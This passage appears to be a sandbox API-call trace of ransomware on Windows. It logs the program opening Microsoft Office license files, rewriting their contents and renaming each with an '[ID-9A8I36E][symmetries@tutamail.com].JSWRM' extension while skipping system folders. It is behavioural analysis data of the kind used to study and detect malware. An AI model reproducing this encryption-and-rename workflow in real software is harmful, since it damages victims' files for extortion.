returned 29 [0110.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0110.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0110.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Grace-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0110.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0110.398] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Grace-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0110.398] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0110.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0110.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0110.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0110.399] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.399] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11604) returned 1 [0110.399] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0110.399] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0110.401] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.402] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0110.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.402] CloseHandle (hObject=0x45c) returned 1 [0110.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0110.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0110.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0110.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0110.402] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0110.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0110.402] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.402] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0110.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0110.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0110.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0110.403] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0110.403] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb738c87, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb738c87, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb81da9d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x298f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StandardR_Retail-pl.xrm-ms", cAlternateFileName="STA55E~1.XRM")) returned 1 [0110.404] lstrcmpiW (lpString1="StandardR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0110.404] lstrcmpiW (lpString1="StandardR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0110.404] lstrcmpiW (lpString1="StandardR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0110.404] lstrcmpiW (lpString1="StandardR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0110.405] lstrcmpiW (lpString1="StandardR_Retail-pl.xrm-ms", lpString2="recovery") returned 1 [0110.405] lstrcmpiW (lpString1="StandardR_Retail-pl.xrm-ms", lpString2="perflogs") returned 1 [0110.405] lstrcmpiW (lpString1="StandardR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0110.405] lstrcmpiW (lpString1="StandardR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.405] lstrcmpiW (lpString1="StandardR_Retail-pl.xrm-ms", lpString2="system volume information") returned -1 [0110.405] lstrcmpiW (lpString1="StandardR_Retail-pl.xrm-ms", lpString2="msocache") returned 1 [0110.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0110.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Retail-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0110.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0110.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Retail-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241178, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0110.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0110.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0110.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Retail-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0110.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0110.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Retail-pl.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241218, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0110.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0110.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0110.405] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0110.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.405] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0110.405] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.406] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10639) returned 1 [0110.406] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0110.406] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0110.408] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.408] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0110.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.408] CloseHandle (hObject=0x45c) returned 1 [0110.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0110.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0110.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0110.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0110.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0110.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0110.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0110.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0110.409] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0110.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0110.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0110.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0110.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0110.410] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeba33b90, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeba33b90, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebe86003, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x57f6, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StandardR_Retail-ppd.xrm-ms", cAlternateFileName="STBC3E~1.XRM")) returned 1 [0110.410] lstrcmpiW (lpString1="StandardR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0110.410] lstrcmpiW (lpString1="StandardR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0110.410] lstrcmpiW (lpString1="StandardR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0110.410] lstrcmpiW (lpString1="StandardR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0110.410] lstrcmpiW (lpString1="StandardR_Retail-ppd.xrm-ms", lpString2="recovery") returned 1 [0110.410] lstrcmpiW (lpString1="StandardR_Retail-ppd.xrm-ms", lpString2="perflogs") returned 1 [0110.410] lstrcmpiW (lpString1="StandardR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0110.410] lstrcmpiW (lpString1="StandardR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.410] lstrcmpiW (lpString1="StandardR_Retail-ppd.xrm-ms", lpString2="system volume information") returned -1 [0110.410] lstrcmpiW (lpString1="StandardR_Retail-ppd.xrm-ms", lpString2="msocache") returned 1 [0110.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0110.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Retail-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0110.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0110.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Retail-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x2412e0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0110.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0110.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0110.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Retail-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0110.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0110.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Retail-ppd.xrm-ms", cchWideChar=27, lpMultiByteStr=0x241010, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0110.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0110.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0110.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0110.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.410] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0110.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.411] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22518) returned 1 [0110.411] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x57f0) returned 0x24c1d0 [0110.411] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x57f0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x57f0, lpOverlapped=0x0) returned 1 [0110.414] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.414] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x57f0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x57f0, lpOverlapped=0x0) returned 1 [0110.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.414] CloseHandle (hObject=0x45c) returned 1 [0110.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0110.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0110.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0110.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0110.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0110.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0110.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0110.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0110.415] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardr_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0110.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0110.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0110.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0110.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0110.416] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb9e776b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb9e776b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeba59def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d45, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StandardR_Retail-ul-oob.xrm-ms", cAlternateFileName="STCA24~1.XRM")) returned 1 [0110.416] lstrcmpiW (lpString1="StandardR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0110.416] lstrcmpiW (lpString1="StandardR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0110.416] lstrcmpiW (lpString1="StandardR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0110.416] lstrcmpiW (lpString1="StandardR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0110.416] lstrcmpiW (lpString1="StandardR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0110.416] lstrcmpiW (lpString1="StandardR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0110.416] lstrcmpiW (lpString1="StandardR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0110.416] lstrcmpiW (lpString1="StandardR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.416] lstrcmpiW (lpString1="StandardR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0110.416] lstrcmpiW (lpString1="StandardR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0110.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0110.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardR_Retail-ul-oob.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0110.416] RtlAllocateHeap 